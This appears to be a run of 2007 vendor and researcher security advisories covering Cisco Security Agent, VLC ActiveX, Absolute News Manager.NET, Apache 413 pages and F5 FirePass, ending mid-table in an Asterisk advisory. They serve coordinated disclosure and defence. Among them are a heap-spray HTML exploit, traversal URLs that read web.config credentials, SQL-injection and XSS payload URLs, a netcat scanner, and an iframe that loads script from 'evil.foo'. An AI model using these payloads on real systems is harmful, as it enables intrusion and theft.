CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete

CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed

Impact
======

Successful exploitation of the buffer overflow vulnerability described
in this advisory may result in an operating system crash or complete
system compromise.

Software Versions and Fixes
===========================

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Managed Cisco Security Agents
+----------------------------

Fixed software for managed Cisco Security Agents is available in the
form of hotfixes. The following table contains hotfix information for
the current supported versions of Cisco Security Agent. Future versions
of Cisco Security Agent will have the fix included.

+----------------------------------------+
| Affected Cisco Security | Hotfix |
| Agent Version | Version |
|--------------------------+-------------|
| 4.5.1 | Hotfix |
| | 4.5.1.672 |
|--------------------------+-------------|
| 5.0 | Hotfix |
| | 5.0.0.225 |
|--------------------------+-------------|
| 5.1 | Hotfix |
| | 5.1.0.106 |
|--------------------------+-------------|
| 5.2 | Hotfix |
| | 5.2.0.238 |
+----------------------------------------+

Cisco Security Agent hotfixes can be downloaded from the following
location:

http://www.cisco.com/cgi-bin/tablebuild.pl/csahf-crypto?psrtdcat20e2

Cisco Security Agent for Cisco IP Communications Products
+--------------------------------------------------------

The following table contains information about Cisco Security Agent
fixes for Cisco IP Communications products:

+--------------------------------------------+
| Affected | |
| Cisco | |
| Security | Fixed Software |
| Agent | |
| Version | |
|----------+---------------------------------|
| 4.5.1 | CUCM-CSA-4.5.1.672-2.0.7-k9.exe |
|----------+---------------------------------|
| 5.0 | CUCM-CSA-5.0.0.225-3.0.7-k9.exe |
+--------------------------------------------+

These fixes can be downloaded from the following location:

http://www.cisco.com/cgi-bin/tablebuild.pl/cmva-3des?psrtdcat20e2

Cisco Security Agent for Cisco Security Manager
+----------------------------------------------

A fixed standalone Cisco Security Agent for the Cisco
Security Manager is provided in the form of the hotfix
fcs-csamc-hotfix-5.2.0.238-w2k3-k9-CSM.zip, which is available for
download from:

http://www.cisco.com/cgi-bin/tablebuild.pl/csm-app?psrtdcat20e2.

Workarounds
===========

General Considerations
+---------------------

Filters that deny SMB protocol packets using TCP ports 139 and 445
should be deployed as part of a transit access control list (tACL)
policy for protection from traffic that enters the network at ingress
access points. This policy should be configured to protect the network
device where the filter is applied and other devices behind it. Filters
for SMB protocol packets using TCP ports 139 and 445 should also be
deployed in front of vulnerable hosts so that traffic is allowed only
from trusted clients.

Additional information about tACLs is available in "Transit Access
Control Lists : Filtering at Your Edge":

http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml

Additional mitigation techniques that can be deployed on Cisco devices
within the network are available in the Cisco Applied Mitigation
Bulletin companion document for this advisory:

http://www.cisco.com/warp/public/707/cisco-amb-20071205-csa.shtml

Cisco Security Agent Rule to Block TCP Port 139 and 445 Traffic
+--------------------------------------------------------------

Workstations that do not have a need to provide SMB services, such as
services for sharing directories or files and printers, can be protected
by configuring a Cisco Security Agent rule that blocks all traffic to
TCP ports 139 and 445 (the SMB ports).

Such a rule exists in versions of Cisco Security Agent that include
the Network Personal Firewall policy. The specific rule can be found
by searching rules for one that has the description "All applications,
server for SMB services (offering network shares)" or by opening the
Personal Firewall Module rule module (attached to the Network Personal
Firewall policy) and editing the rule that has this description. This
rule is enabled by default but the default action must be changed from
Allow to a High Priority Deny.

If the Network Personal Firewall policy is not available, administrators
can create a network access rule that blocks traffic to TCP ports 139
and 445. To do this, the rule must be configured as a Deny rule so
traffic is denied when the system on which Cisco Security Agent is
installed attempts to act as a server for network services on ports TCP
139 and 445. For additional information on configuring Cisco Security
Agent network access control rules, reference the following document:

http://www.cisco.com/en/US/docs/security/csa/csa52/user_guide/Chap6.html#wp1199624.

Caution: Blocking TCP ports 139 and 445 on a Windows system will cause
the Windows system to stop providing SMB services. Before implementing
the workarounds presented in this section, administrators are advised to
ensure that they understand the implications of disabling SMB services
on users' workstations.

Obtaining Fixed Software
========================

Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@... or security-alert@... for software
upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows:

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@...

Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.

This vulnerability was reported to Cisco by the NSFocus Security Team
(http://www.nsfocus.com). Cisco would like to thank the NSFocus Security
Team for reporting this vulnerability and working with us towards
resolution of this problem.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml

In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.

* cust-security-announce@...
* first-teams@...
* bugtraq@...
* vulnwatch@...
* cisco@...
* cisco-nsp@...
* full-disclosure@...
* comp.dcom.sys.cisco@...

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.

Revision History
================

+-------------------------------------------------------------+
| Revision 1.0 | 2007-December-05 | Initial public release. |
+-------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.

+--------------------------------------------------------------------
All contents are Copyright (C) 2006-2007 Cisco Systems, Inc. All rights
reserved.
+--------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHVuh586n/Gc8U/uARAv1iAJ9Bd0AHbbJYSVDHCjunVqSt/8wuTwCfU2qj
HAfK0DW2cJ4+nR9hH2nOOmk=
=ZQXL
-----END PGP SIGNATURE-----

CORE-2007-1004: VLC Activex Bad Pointer Initialization Vulnerability

2007-12-04T08:26:02Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies – CoreLabs Advisory
http://www.coresecurity.com/corelabs

VLC Activex Bad Pointer Initialization Vulnerability

*Advisory Information*
Title: VLC Activex Bad Pointer Initialization Vulnerability
Advisory ID: CORE-2007-1004
Advisory URL: http://www.coresecurity.com/?action=item&id=2035
Date published: 2007-12-04
Date of last update: 2007-12-03
Vendors contacted: VLC
Release mode: Coordinated Release

*Vulnerability Information*
Class: Access validation error
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: N/A

*Vulnerability Description*
VLC player is a popular multimedia player for various audio and video
formats, and various streaming protocols.

A vulnerability has been found in the ActiveX control DLL (axvlc.dll)
used by VLC player. This library contains three methods whose parameters
are not correctly checked, and may produce a bad initialized pointer. By
providing these functions specially crafted parameters, an attacker can
overwrite memory zones and execute arbitrary code.

*Vulnerable packages*
VLC media player version 0.86, 0.86a, 0.86b y 0.86c.

*Non-vulnerable packages*
VLC media player versions prior to 0.86.
VLC media player version 0.86d.

*Vendor Information, Solutions and Workarounds*
VLC media player 0.8.6d adresses this issue and introduces further
usability fixes.

Download it from the VideoLAN project website: http://www.videolan.org/

*Credits*
This vulnerability was discovered by Ricardo Narvaja (Ricnar) from the
Exploit Writers team of Core Security Technologies.

*Technical Description / Proof of Concept Code*
The ActiveX control DLL (axvlc.dll) contains three methods whose
parameters are not correctly checked, and may produce a bad initialized
pointer. By providing these functions specially crafted parameters, an
attacker can overwrite memory zones and execute arbitrary code.

The vulnerable functions are:

Sub addTarget (
ByVal uri As String ,
ByVal options As Variant ,
ByVal mode As VLCPlaylistMode ,
ByVal Position As Long)

Function getVariable (ByVal name As String)

Sub setVariable (
ByVal name As String ,
ByVal value As Variant)

The parameters declared as String are the cause of the vulnerability.

The following assembly code is where the axvlc.dll library crashes. The
pointer that is read to be executed, can be overwritten, depending on how
the strings are sent. It also requires that previously other files are
loaded that left the pointer bad initialized, with the value that the
attacker needs to jump to his own code.

000113CD FF50 14 CALL DWORD PTR DS:[EAX+14]
000113D0 8B53 08 MOV EDX,DWORD PTR DS:[EBX+8]
000113D3 85D2 TEST EDX,EDX

The following is a PoC HTML file, using one of the vulnerable methods
(addTarget).

<html>
<head>
<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8'
id='target' ></object>
</head>
<body>
<script>
var mm = null;

if( target != null )
{
var param1 = unescape("%u0505%u0505");
var salame = "defaultV";
var salame2 = 1;
var salame3 = 0;

ag = unescape("%uCCCC%uCCCC");
sh =
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%");
sz = sh.length * 2;
npsz = 0x400000 - (sz + 0x38);
nps = unescape("%u0505%u0505");

while(nps.length * 2 < npsz) nps += nps;
ihbc = (0x0E000000 - 0x400000) / 0x400000;
mm = new Array();

for(i = 0; i <= ihbc; i++) mm[i] = nps + sh;

for(var i=0;i<2000;i++)
param1 = param1 + unescape("%u0505%u0505");

target.getVariable (param1);
}
</script>
</body>
</html>

*Additional information*
[1] Practical demonstration of VLC ActiveX vulnerability
http://www.coresecurity.com/files/attachments/CORE-2007-1004-VLC-tutorial.pdf

*Report Timeline*
2007-10-26: Core notifies the VLC team of the vulnerability.
2007-10-29: Technical details sent by Core to VLC.
2007-11-23: VLC notifies Core that a fix has been produced, and will be
released in VLC version 0.8.6d.
2007-11-30: VLC releases version 0.8.6d, which fixes this vulnerability.
2007-12-04: CORE-2007-1004 advisory is published.

*About Corelabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/

*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. IMPACT evaluates network, endpoint
and end-user vulnerabilities and identifies what resources are exposed.
It enables organizations to determine if current security investments are
detecting and preventing attacks. Core augments its leading technology
solution with world-class security consulting services, including
penetration testing and software security auditing. Based in Boston, MA
and Buenos Aires, Argentina, Core Security Technologies can be reached at
617-399-6980 or on the Web at
http://www.coresecurity.com.

*DISCLAIMER*
The contents of this advisory are copyright (c) 2007 CORE Security
Technologies and (c) 2007 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*PGP/GPG KEYS*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFHVX+ayNibggitWa0RAuaNAJ9TKYfpopNcnuAwycq9wqKeacoGggCgnrxn
J8l/kRHXfxvHQ0lFJIbvRkk=
=gYOg
-----END PGP SIGNATURE-----

PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection

2007-12-04T06:32:03Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PR07-39: Multiple vulnerabilities on Absolute News Manager.NET 5.1
including file retrieval and SQL injection

Vulnerabilities found: 16 November 2007

Vendor informed: 19 November 2007

Vulnerability fixed: 28 November 2007

Severity: High

Description:

Multiple vulnerabilities were found on Absolute News Manager.NET 5.1:

- - unauthenticated file retrieval (directory traversal) on
'/pages/default.aspx'

- - unauthenticated SQL injection on 'xlaabsolutenm.aspx' and possibly
'/pages/default.aspx'

- - XSS on 'xlaabsolutenm.aspx' and '/pages/default.aspx'

- - webroot disclosure on 'getpath.aspx'

File retrieval PoC:

The following URL shows the contents of .NET 'web.config' (contains DB
credentials):
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=../web.config

The following URL show contents of the vulnerable script:
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=1&template=default.aspx%00

Note: in order to obtain the content of '.aspx' files, a null byte '%00'
must be added after the filename.

Show content of other scripts:

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../anmviewer.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../default.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../PPL1HistoryTicker.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlagc.ascx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../xlaabsolutenm.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../streamconfig.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../articlefiles/r.asp%00
http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=../incSystem.aspx%00

SQL injection PoCs:

Vulnerable script: /[CustomerDefinedDir]/xlaabsolutenm.aspx
Vulnerable parameters: z, pz, ord, sort

Requesting the following URL returns the version of Windows and SQL server:

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=@@version&pz=9&featured=n&ord=desc&sort=posted&rmore=-&

System.Data.SqlClient.SqlException: Conversion failed when converting
the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to
data type int.

Other URLs:

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc&sort=headline'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10&ord=asc'INJECTED_PAYLOAD&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=10'INJECTED_PAYLOAD&ord=asc&sort=headline&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=15'INJECTED_PAYLOAD&ss=y&size=1.1em&target=iframe&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc&sort=headline'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21&ord=asc'INJECTED_PAYLOAD&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4&pz=21'INJECTED_PAYLOAD&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=4'INJECTED_PAYLOAD&pz=21&ord=asc&sort=headline&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc&sort=posted'INJECTED_PAYLOAD&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&ord=desc'INJECTED_PAYLOAD&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=8'INJECTED_PAYLOAD&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc&sort=posted'INJECTED_PAYLOAD&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9&featured=n&ord=desc'INJECTED_PAYLOAD&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6&pz=9'INJECTED_PAYLOAD&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&ord=desc&sort=posted&featured=n&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=8&featured=only&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=6'INJECTED_PAYLOAD&pz=9&featured=n&ord=desc&sort=posted&rmore=-&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc&sort=posted'INJECTED_PAYLOAD&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7&ord=desc'INJECTED_PAYLOAD&sort=posted&
http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=7'INJECTED_PAYLOAD&ord=desc&sort=posted&

The script '/pages/default.aspx' might also be vulnerable to SQL
injection but it has not been confirmed.

Requesting the following URLs:

http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=40&z=9999999999999
http://target.tld/[CustomerDefinedDir]/pages/default.aspx?a=9999999999999&z=1

return the following error:

System.Data.SqlClient.SqlException: Error converting data type nvarchar
to int.

XSS PoCs:

Vulnerable script: '/xlaabsolutenm.aspx'
Unsanitized parameter: 'rmore'

http://target.tld/[CustomerDefinedDir]/xlaabsolutenm.aspx?z=1,7&sort=articleID&ord=desc&rmore=%3Cscript%3Ealert(1)%3C/script%3E&size=2&h=abc&isframe=y

Vulnerable script: '/pages/default.aspx'
Unsanitized parameter: 'template'

http://target.tld/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E

Webroot PoC:

Requesting the 'getpath.aspx' demo script discloses the physical path of
the webroot - ie:

http://target.tld/[CustomerDefinedDir]/getpath.aspx

"
Absolute News Manager Physical Path :
D:\inetpub\target.tld\[CustomerDefinedDir]\

Please delete this file from your installation.
"

Consequences:

Contents of any files on the web server can be obtained. Unauthorized
SQL queries can be injected. Scripting code can be run within the
security context of the target domain. Information about the target
environment can be extracted.

Fix:

http://www.xigla.com/security/
http://www.xigla.com/security/ANMNET51-SecurityUpdate20071128.zip

Note: ProCheckUp has NOT tested the patch provided by Xigla Software.

References:

http://www.procheckup.com/Vulnerability_2007.php
http://www.xigla.com/absolutenmnet/

Credits: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd
(www.procheckup.com)

ProCheckUp thanks Xigla Software for working with us.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHVWTjUmN3xwbmU6YRArBaAKCfaedCzv9GoNNvVvpr0qvWwaPHxwCdHEcf
Utw96j4ZOvsAz4vrzne0h2c=
=btup
-----END PGP SIGNATURE-----

PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method

2007-11-30T08:15:14Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method

Vulnerability found: 7 November 2007

Vendor contacted: 14 November 2007

Risk factor: N/A

The reason why we didn't consider this vulnerability a security risk is
because the attacker needs to force the victim's browser to submit a
malformed HTTP method.

Header injection has been demonstrated to be possible using Flash [1]
[2], but might be dependent on vulnerable Flash plugins.

A relevant example published in the past is exploiting the Apache
'Expect' XSS [3] (CVE-2006-3918) using flash [4].

However, in this case we need to spoof the HTTP METHOD to a
specially-crafted value.

Description:

It is possible to cause Apache HTTP server to return client-supplied
scripting code by submitting a malformed HTTP method which would
actually carry the payload (i.e.: malicious JavaScript) and invalid
length data in the form of either of the following:

Two 'Content-length:' headers equals to zero. i.e.: "Content-Length:
0[LF]Content-Length: 0"
One 'Content-length:' header equals to two values. i.e.:
"Content-length: 0, 0"
One 'Content-length:' header equals to a negative value. i.e.:
"Content-length: -1"
One 'Content-length:' header equals to a large value. i.e.:
"Content-length: 9999999999999999999999999999999999999999999999"

Apache 2.X returns a '413 Request Entity Too Large' error, when
submitting invalid length data. When probing for XSS on the error page
returned by the server we have 3 possible string vectors:

The 'Host:' header
The URL
The HTTP method

If we probe for XSS using the 'Host:' header, Apache correctly filters
the angle brackets and replaces them with HTML entities:

REQUEST:

GET / HTTP/1.1
Host: <BADCHARS>
Connection: close
Content-length: -1
[LF]
[LF]

SERVER'S REPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:40:19 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with GET requests, or the amount of data
provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at <badchars>
Port 80</address>
</body></html>

Notice that '<BADCHARS>' gets replaced with '<badchars>'

If we probe for XSS using the URL, Apache ALSO correctly filters the
angle brackets and replaces them with HTML entities:

REQUEST:

GET /<BADCHARS>/ HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]

SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:41:17 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<BADCHARS>/<br />
does not allow request data with GET requests, or the amount of data
provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo
Port 80</address>
</body></html>

Again, '<BADCHARS>' gets replaced with '<badchars>'

However, if we probe for XSS using a malformed HTTP method, the angle
brackets are NOT replaced with HTML entities:

REQUEST:

<BADCHARS> / HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]

SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:42:46 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with <BADCHARS> requests, or the amount of
data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo
Port 80</address>
</body></html>

The following script could be used to audit your network for vulnerable
web servers:

#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
echo "$0 <hosts-file>"
exit
fi

for i in `cat $1`
do

if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection:
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep
- -i '<PROCHECKUP>' > /dev/null
then
echo "$i is VULNERABLE!"
fi

done

Vulnerability successfully tested on (banners extracted from server
headers):

Server: Apache/2.0.46 (Red Hat)
Server: Apache/2.0.51 (Fedora)
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7g
Server: Apache/2.2.3 (FreeBSD) mod_ssl/2.2.3 OpenSSL/0.9.7e-p1 DAV/2
Server: Apache/2.2.4 (Linux/SUSE)

Note: other versions might also be vulnerable.

Consequences:

This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e.
session IDs) to unauthorised third parties provided that a web browser
is tricked to submit a malformed HTTP method.

Workaround:

Disable Apache's default 413 error pages by adding a 'ErrorDocument 413'
statement to the Apache config file.

References:

http://www.procheckup.com/Vulnerability_2007.php

[1] "Forging HTTP request headers with Flash"
http://archives.neohapsis.com/archives/bugtraq/2006-07/0425.html

[2] "HTTP Header Injection Vulnerabilities in the Flash Player Plugin"
http://download2.rapid7.com/r7-0026/

[3] "Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1"
http://www.securityfocus.com/archive/1/433280

[4] "More Expect Exploitation In Flash"
http://ha.ckers.org/blog/20071103/more-expect-exploitation-in-flash/

Credits: Adrian Pastor and Amir Azam of ProCheckUp Ltd (www.procheckup.com).

Special thanks go to Amit Klein and Joe Orton for providing such
valuable feedback.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHUDcSUmN3xwbmU6YRApBiAJ4qj8fxM0aXe70OHmerS4SCxhMxjQCdETTm
mQehf2QDRpoig1kjzxdIEcU=
=qQdC
-----END PGP SIGNATURE-----

PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.activation.php3' server-side script

2007-11-30T04:49:54Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100
SSL VPN 'my.activation.php3' server-side script

Date Found: 19th June 2007

Successfully tested on: version 5.5.2

F5 Networks has confirmed the following versions to be vulnerable:

FirePass versions 5.4.1 - 5.5.2
FirePass versions 6.0 - 6.0.1

Description:

F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the
"my.activation.php3" server-side script.

No authentication is required to exploit this vulnerability.

Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who visits a specially-crafted URL to an F5
Firepass device, or visits a malicious page that makes a request to such
URL. Such code would run within the security context of the target domain.

This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e. admin
session IDs) to unauthorised third parties.

Proof of concept (PoC) URL:

https://target.tld/my.activation.php3?"></script><textarea>HTML_injection_test</textarea><!--

The payload in the example is

"></script><textarea>HTML_injection_test</textarea><!--

which injects a 'textarea' box

The following PoC HTML page would run JavaScript without any
restrictions from a third-party file ('http://www.evil.foo/b' in this case):

<html>

<iframe
src="https://target.tld/my.activation.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--"
width="0%" height="0%"
name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe>

</html>

Successfully tested on:

Server environment:

F5 FirePass 4100

Client environment:

Microsoft Internet Explorer 7.0.5730.11

Severity: Medium/High

Authors: Adrian Pastor and Jan Fry of ProCheckUp Ltd (www.procheckup.com).

With thanks to Petko D. Petkov for suggesting the eval(name) technique.

References:

http://www.procheckup.com/Vulnerability_2007.php
http://www.f5.com/products/FirePass/

Fix:

F5 Networks has issued SOL7923:

https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHUAbyUmN3xwbmU6YRAu2zAJ4gwWStG8drTy6jn7eAl2dLBGtiTACfccst
7J8K7gEr7efixJBejJv5vak=
=W5Zm
-----END PGP SIGNATURE-----

AST-2007-026 - SQL Injection issue in cdr_pgsql

2007-11-29T15:14:03Z

Asterisk Project Security Advisory - AST-2007-026

+------------------------------------------------------------------------+
| Product | Asterisk |
|----------------------+-------------------------------------------------|
| Summary | SQL Injection issue in cdr_pgsql |
|----------------------+-------------------------------------------------|
| Nature of Advisory | SQL Injection |
